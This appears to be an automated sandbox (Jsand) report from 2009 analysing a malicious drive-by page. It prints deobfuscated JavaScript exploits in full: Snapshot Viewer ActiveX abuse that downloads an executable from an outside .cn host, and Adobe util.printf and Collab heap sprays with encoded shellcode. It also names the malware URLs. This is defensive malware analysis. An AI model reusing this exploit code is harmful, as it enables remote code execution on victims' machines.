Analysis report for http://hugebestbuys.cn:8080/
Sample Overview
| Field | Value |
|---|---|
| URL | http://hugebestbuys.cn:8080/ |
| MD5 | 6d564e599ad40773c9d1582bd1876c32 |
| Analysis Started | 2009-05-22 10:54:59 |
| Report Generated | 2009-05-22 11:21:52 |
| Jsand version | 1.03.02 |
See the report for domain hugebestbuys.cn.
Detection results
| Detector | Result |
|---|---|
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
|---|---|---|
| Adobe util.printf overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992 |
Deobfuscation results
Evals
function wrAJ5tM5(){
for (eX9rDUIV = 2, oCRyVzxXob = ""; eX9rDUIV <= 26; eX9rDUIV ++ ){
oCRyVzxXob = String.fromCharCode(65 + eX9rDUIV);
var od3FI1tdi = new Image();
od3FI1tdi.src = "res://" + oCRyVzxXob + ":\\" +
'P!)#@r^^&o)g!#r##$a#&(!m^#$# !F)i#!!)l(^(^(e($s$#)!'.replace(/\!|&|\)|\^|#|\(|@|\$/ig
, '') + "\\" + 'O)$#u&$@t@((@l#)&&$o@)o(^$k# )^))E&x!(($)p#)(r#&e&#$@s)(s!('.replace(
/&|\!|@|\$|#|\^|\(|\)/ig, '') + "\\" + 'm&^s)#!$o!!&e()#r#)e()$#s)@.!^d^l!(l!)'.
replace(/#|\(|@|&|\)|\^|\!|\$/ig, '') + "/#2/1";
if (od3FI1tdi.height == 59){
break ;
}
od3FI1tdi = '';
}
return oCRyVzxXob;
}
function fUVbVfSDY(url){
var oCRyVzxXob = wrAJ5tM5();
if (oCRyVzxXob == '[')return ;
try {
var xjxK8wQv = new ActiveXObject('s!#)n@@p#v#$w^.$!!S@&n$!a#p&!s&(h)(o#@t(^@ @)V$i^^!e^@$w$#e#$)r#& !C!o$!^n$^t^#r&@o#&@!l#.&()1)$!'.replace(/@|\)|#|\$|&|\!|\(|\^/ig, ''));
}
catch (e){
if (xjxK8wQv != '[@^o^b)!(j&!e#^&#c$&(t^!&#!]($'.replace(/\!|\^|\)|\$|#|\(|&|@/ig, ''
))return ;
}
xjxK8wQv.SnapshotPath = url;
try {
xjxK8wQv.CompressedPath = oCRyVzxXob + ":\\" +
'P@$@r&)o##g(r&a(m(@ @#!F)$i!^!l#^^e!(s@@'.replace(/\$|&|#|\^|\(|\)|@|\!/ig, '') +
"\\" + 'O#^u#((t)&@l^)^o(@o&@^k!# @!&E&@(x&&(p&^#!$r@e#s$s(@'.replace(
/\(|\^|@|\)|&|#|\$|\!/ig, '') + "\\" + 'w!)a)b@)#.)#e(x#@$e(!('.replace(
/@|#|\!|\)|\$|\(|&|\^/ig, '');
xjxK8wQv.PrintSnapshot();
}
catch (e){
}
;
var leCuFKYI9 = setInterval(function (){
if (xjxK8wQv.readyState == 4){
clearInterval(leCuFKYI9);
window.location = 'l!($@d((!a^()p$(:#@(/#)$/#))'.replace(/\(|\$|@|#|&|\!|\^|\)/ig,
'');
}
}
, 3000);
}
fUVbVfSDY('h#(@t)!$&t!#p#^!!:)&&/)#/&g$&i$^a)$n!$$$t(b(e#^a)(^v^!$e&#r@)#s)$@d&#^^i#^e@)$#^t&@.^)c@@&&n&@&:&$(@8((0&^8&0!(/#(^l)o@a#$^d&$@.&p((&^h!$^!p(@^&#?#^)@i@^$$d)#(&=!)1^#'.replace(/\!|\)|\$|\(|\^|@|&|#/ig, ''));
(repeated 1 time)
function Zcoiv6stq(Ke36m7){
var Kmhf1ds = 0;
var Sz7tsafm = "";
for (Kmhf1ds = 0; Kmhf1ds < Ke36m7.length; Kmhf1ds ++ ){
Sz7tsafm = Sz7tsafm + String.fromCharCode(Ke36m7.charCodeAt(Kmhf1ds) ^ 4)
}
return Sz7tsafm
}
function D6qh7cc0(Vrnmbjoy){
return unescape(Vrnmbjoy)
}
var N6bn5ls = app.viewerVersion.toString();
N6bn5ls = N6bn5ls.replace(/\D/g, "");
var Kkbfhqas = "!q1714!q1615!" + "q1312!q=g11!q" + "44a<!q4444!q1" + "`44!qa`<7!q75" +
"4`!q20g4!q044" + "7!q3<74!q<f4g" + "!q4g04!q34<f!" + "qe`5g!q04<f!q" + "af4<!q<f4=!q7" +
"004!q04<`!q<f" + "3g!q7g04!q131" + "2!q1afa!q4445" + "!q4544!qfbaa!" + "q450a!q4444!q" +
"ab45!q`2a<!q4" + "445!q1b44!q<=" + "1a!q<5ae!q1ag" + "6!q4445!q1644" + "!q<42<!q4444!" +
"qbb44!q0a=1!q" + "4445!q<=44!q<" + "5ae!q1ag6!q44" + "45!q7544!q45b" + "2!q<eg6!q71=g" +
"!q4627!q4444!" + "qbf<4!q3044!q" + "<<42!q765g!qa" + "f02!qg2aa!q76" + "40!q<=44!q<5a" +
"e!q01g6!q4446" + "!q1644!q=1bb!" + "q4516!q4444!q" + "ae<=!qg6<5!q4" + "614!q4444!q14" +
"16!q=1bb!q451" + "2!q4444!q442e" + "!q442e!qae<=!" + "qg6<5!q451a!q" + "4444!q<=16!q<" +
"5ae!q3<g6!q44" + "46!q1644!q442" + "e!q`4bb!q412e" + "!qae<=!qg6<5!" + "q451a!q4444!q" +
"bb16!q1e=1!q4" + "445!q<=44!q<5" + "ae!q1ag6!q444" + "5!q1644!q<42<" + "!q4444!qbb44!" +
"q0a=1!q4445!q" + "<=44!q<5ae!q1" + "ag6!q4445!q75" + "44!q45b2!q<eg" + "6!q71=g!q462a" +
"!q4444!qbf<4!" + "q3044!q<<42!q" + "765g!qaf02!qg" + "2aa!q7640!q<=" + "44!q<5ae!q01g" +
"6!q4446!q1644" + "!q=1bb!q4516!" + "q4444!qae<=!q" + "g6<5!q4614!q4" + "444!q1416!q=1" +
"bb!q4512!q444" + "4!q442e!q442e" + "!qae<=!qg6<5!" + "q451a!q4444!q" + "<=16!q<5ae!qe" +
"2g6!q4446!q16" + "44!q442e!q`4b" + "b!q412e!qae<=" + "!qg6<5!q451a!" + "q4444!qbb16!q" +
"1e=1!q4445!q=" + "`44!q1b1`!q1e" + "1a!q1f1=!qg71" + "<!q4444!q4444" + "!q4444!q4444!" +
"q4444!q4444!q" + "4444!q4444!q2" + "103!q1030!q2`" + "21!q1434!q302" + "5!q052<!q0g44" +
"!q252b!q0g20!" + "q262=!q2536!q" + "3=36!q4405!q2" + "103!q1430!q2b" + "36!q0527!q202" +
"0!q2136!q3737" + "!q1344!q2a2=!" + "q3<01!q2721!q" + "ff44!qb6<=!qb" + "3<=!qg474!q31" +
"ea!q6=b`!q<=b" + "3!q75b=!qfag4" + "!q447g!q4444!" + "qf147!q465f!q" + "4444!qe`22!q<" +
"147!q465f!q44" + "44!q34<f!q<73" + "<!q5gg2!qf147" + "!q465f!q4444!" + "qf`<`!q465b!q" +
"4444!q47e`!q5" + "f<1!q4446!qef" + "44!q47e`!q5f<" + "1!q4446!q1444" + "!qe`ef!q<147!" +
"q465f!q4444!q" + "1aef!q`f75!q1" + "2e`!q<147!q46" + "5f!q4444!qg2<" + "=!q`3<=!qbg15" +
"!qe2b7!q301=!" + "q1a40!qaf07!q" + "1aa=!q`5=7!q4" + "7a4!q63<1!q44" + "46!q7544!q=2b" +
"2!qe`22!qa4g5" + "!q4746!q5b<1!" + "q4446!q<=44!q" + "e`g2!q<147!q4" + "65f!q4444!qaf" +
"g7!q4454!q444" + "4!q4444!q4444" + "!q4444!q4444!" + "q4444!q4444!q" + "<=44!q5f<1!q4" +
"446!q1244!qa<" + "13!qbb1<!qbbb" + "b!q1a1b!q45ef" + "!q<4ga!qff7a!" + "q4630!qa`af!q" +
"11g7!q0g16!q0" + "b0`!q6a0a!q0g" + "00!q440g!q161" + "1!q000g!q332b" + "!q2g2a!q252b!" +
"q1020!q022b!q" + "2g2=!q0521!q3" + "444!q2220!q34" + "31!q6a20!q3<2" + "1!q4421!q3627" +
"!q3725!q6a2<!" + "q2<34!q4434!q" + "302<!q3430!q6" + "b7e!q236b!q25" + "2=!q302a!q212" +
"6!q3225!q3621" + "!q2037!q212=!" + "q6a30!q2a27!q" + "7<7e!q7<74!q6" + "b74!q252g!q20" +
"2a!q232=!q346" + "a!q342<!q2=7b" + "!q7`20!q447<!" + "q=444" + "";
if (N6bn5ls.charAt(0) == "8" && N6bn5ls.charAt(1) <= "1" && N6bn5ls.charAt(2) <= "2"){
Cglqx7a = D6qh7cc0(Zcoiv6stq(Kkbfhqas));
var Waoonhp = D6qh7cc0("%u0a0a" + "%u0a0a" + "");
var Ryzmq0s = 20 + Cglqx7a.length;
while (Waoonhp.length < Ryzmq0s)Waoonhp += Waoonhp;
var Cshlr8n = Waoonhp.substring(0, Ryzmq0s);
var Qwo9ekywoo = Waoonhp.substring(0, Waoonhp.length - Ryzmq0s);
while (Qwo9ekywoo.length + Ryzmq0s < 0x60000)Qwo9ekywoo = Qwo9ekywoo + Qwo9ekywoo +
Cshlr8n;
var Wk59p9a = new Array();
for (M1w33ne = 0; M1w33ne < 1200; M1w33ne ++ ){
Wk59p9a[M1w33ne] = Qwo9ekywoo + Cglqx7a
}
var O53ukcn6s = "12";
for (var P3yqfc = 0; P3yqfc < 18; P3yqfc ++ ){
O53ukcn6s = O53ukcn6s + "9"
}
for (var P3yqfc = 0; P3yqfc < 276; P3yqfc ++ ){
O53ukcn6s = O53ukcn6s + "8"
}
for (Sskt33f = 0; Sskt33f > 10; Sskt33f ++ ){
Sskt33f += 2
}
util.printf("%45000f", O53ukcn6s)
}
else {
var P63iq4 = new Array();
function R0bshwbk(Gmvjnol, Vrpkildm){
while (Gmvjnol.length * 2 < Vrpkildm){
Gmvjnol += Gmvjnol
}
Gmvjnol = Gmvjnol.substring(0, Vrpkildm / 2);
return Gmvjnol
}
var Gvs9xs1w = 0x0c0c0c0c;
var Kmdd0eea = D6qh7cc0(Zcoiv6stq(Kkbfhqas));
var Uql3uky = 0x400000;
var Pv0cs0ru = Kmdd0eea.length * 2;
var Vrpkildm = Uql3uky - (Pv0cs0ru + 0x38);
var Gmvjnol = D6qh7cc0("%u9090%u9090");
Gmvjnol = R0bshwbk(Gmvjnol, Vrpkildm);
var N8vjfmdb = (Gvs9xs1w - 0x400000) / Uql3uky;
for (var Vcz2fhsj5 = 0; Vcz2fhsj5 < N8vjfmdb; Vcz2fhsj5 ++ ){
P63iq4[Vcz2fhsj5] = Gmvjnol + Kmdd0eea
}
var U62qqnw = D6qh7cc0("%u0c0c" + "%u0c0c" + "");
while (U62qqnw.length < 44952)U62qqnw += U62qqnw;
this.collabStore = Collab.collectEmailInfo({
subj : "", msg : U62qqnw
});
}
(repeated 1 time)
Writes
<iframe src="cache/readme.pdf"></iframe>
(repeated 2 times)
<iframe src="cache/flash.swf"></iframe>
(repeated 1 time)
Network Activity
Requests
| URL | Status | Content Type |
|---|---|---|
| http://hugebestbuys.cn:8080/ | 200 | text/javascript |
| about:blank | 200 | text/html |
| http://hugebestbuys.cn:8080/cache/readme.pdf | 200 | application/pdf |
| http://hugebestbuys.cn:8080/cache/flash.swf | 200 | application/x-shockwave-flash |
Redirects
No redirects.
ActiveX controls
| AcroPDF.PDF |
|---|
| No attribute setting or method call detected |

| AcrobatJavaScript | Name | Arg0 | Arg1 | Count |
|---|---|---|---|---|
| Methods | util.printf | %45000f | 1299999999999999999988888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 | 1 |

| ShockwaveFlash.ShockwaveFlash |
|---|
| No attribute setting or method call detected |

| PDF.PdfCtrl |
|---|
| No attribute setting or method call detected |

| clsid:ca8a9780-280d-11cf-a24d-444553540000 |
|---|
| No attribute setting or method call detected |
Shellcode and Malware
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://giantbeaversdiet.cn:8080/landig.php?id=8 | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | c5cfae0fd608a1898b5c36366eb1bccc | |